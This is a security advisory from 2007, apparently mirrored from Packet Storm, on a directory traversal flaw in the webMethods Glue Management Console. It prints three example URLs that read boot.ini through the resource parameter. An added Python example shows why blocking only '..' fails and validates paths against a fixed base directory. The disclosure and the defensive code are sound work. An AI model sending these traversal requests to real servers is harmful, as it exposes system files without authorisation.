glue-lfi.txt

12 Apr 2007 00:00:00 | Reported by Patrick Webster | Type: packetstorm | Source: packetstormsecurity.com

webMethods Glue Management Console Directory Traversal vulnerability in Glue 6.5.1 and below.

Code
`aushack.com - Vulnerability Advisory  
-----------------------------------------------  
Release Date:  
11-Apr-2007  
  
Software:  
webMethods - webMethods Glue Management Console  
http://www.webmethods.com/  
  
"With webMethods Glue developers can easily create SOAP interfaces  
for their existing Java and C/C++ applications, and legacy systems  
can be easily Web service-enabled, allowing reuse. webMethods Glue  
includes a compact, high-performance implementation of important  
standards such as HTTP, Servlets, XML, SOAP, WSDL, and UDDI, and  
interoperates with Microsoft .NET, IBM WebSphere, BEA WebLogic,  
Apache Axis, and other Web service platforms."  
  
Versions affected:  
Glue 6.5.1 and below.  
  
Vulnerability discovered:  
  
Directory Traversal.  
  
Vulnerability impact:  
  
Medium - Read arbitrary system files.  
  
Vulnerability information:  
  
The webMethods Glue Management Console includes HTML pages via  
the /console?resource=console/index.html variable, which is prone  
to a classic traversal attack.  
  
Examples:  
  
http://glueconsole:8080/console?resource=../../../boot.ini  
http://glueconsole:8080/console?resource=\boot.ini  
http://glueconsole:8080/console?resource=c:\boot.ini  
  
Would return the contents of the 'boot.ini' file.  
  
Note that 'c:\boot.ini' is also valid. It may be possible  
(but untested) to traverse other volumes.  
  
References:  
aushack.com advisory  
http://www.aushack.com/advisories/200704-webmethods.txt  
  
Credit:  
Patrick Webster ( [email protected] )  
  
Disclosure timeline:  
20-Mar-2007 - Discovered during quick audit.  
23-Mar-2007 - Vendor notified. No response.  
11-Apr-2007 - Public disclosure.  
  
EOF  
`
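The three request forms in the advisory differ in a way that matters for the fix: only the first contains `..`, so a filter that looks for dot-dot sequences still lets the rooted and drive-qualified forms through. The following is an added example, not code from the advisory or from webMethods. It resolves the `resource` value against a fixed base directory using Windows path rules and rejects anything that lands outside it; the install path `C:\glue\webapps` and all function names are assumptions made for illustration.

```python
import ntpath
from urllib.parse import urlsplit, parse_qs

# Hypothetical install directory for the console's HTML pages (assumption).
CONSOLE_ROOT = r"C:\glue\webapps"

# The legitimate request quoted in the advisory, then its three examples.
ADVISORY_URLS = [
    "http://glueconsole:8080/console?resource=console/index.html",
    "http://glueconsole:8080/console?resource=../../../boot.ini",
    "http://glueconsole:8080/console?resource=\\boot.ini",
    "http://glueconsole:8080/console?resource=c:\\boot.ini",
]

def naive_filter(resource):
    """Blacklist check that only looks for '..'; shown for comparison."""
    return ".." not in resource

def resolve_resource(resource, root=CONSOLE_ROOT):
    """Return the absolute path under root, or None if the value escapes it."""
    if not resource or "\x00" in resource:
        return None
    candidate = resource.replace("/", "\\")   # Windows accepts both separators
    drive, tail = ntpath.splitdrive(candidate)
    if drive or tail.startswith("\\"):
        return None                           # drive-qualified, UNC or rooted path
    root_n = ntpath.normpath(root)
    full = ntpath.normpath(ntpath.join(root_n, candidate))
    # Compare case-insensitively, with a trailing separator so that
    # C:\glue\webapps-old cannot pass as a child of C:\glue\webapps.
    if ntpath.normcase(full).startswith(ntpath.normcase(root_n) + "\\"):
        return full
    return None

def resource_of(url):
    """Extract the decoded 'resource' query parameter from a request URL."""
    return parse_qs(urlsplit(url).query).get("resource", [""])[0]

def audit(urls=ADVISORY_URLS):
    """Map each URL to (naive_filter verdict, resolved path or None)."""
    return {u: (naive_filter(resource_of(u)), resolve_resource(resource_of(u)))
            for u in urls}

if __name__ == "__main__":
    for url, (naive, resolved) in audit().items():
        print(f"{url}\n  naive filter allows: {naive}  resolved: {resolved}")
```

The same canonicalise-then-compare check works as a log review aid: any recorded `/console` request whose `resource` value resolves to `None` is worth a closer look.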


Vulners AI Score: 7.4 (High risk)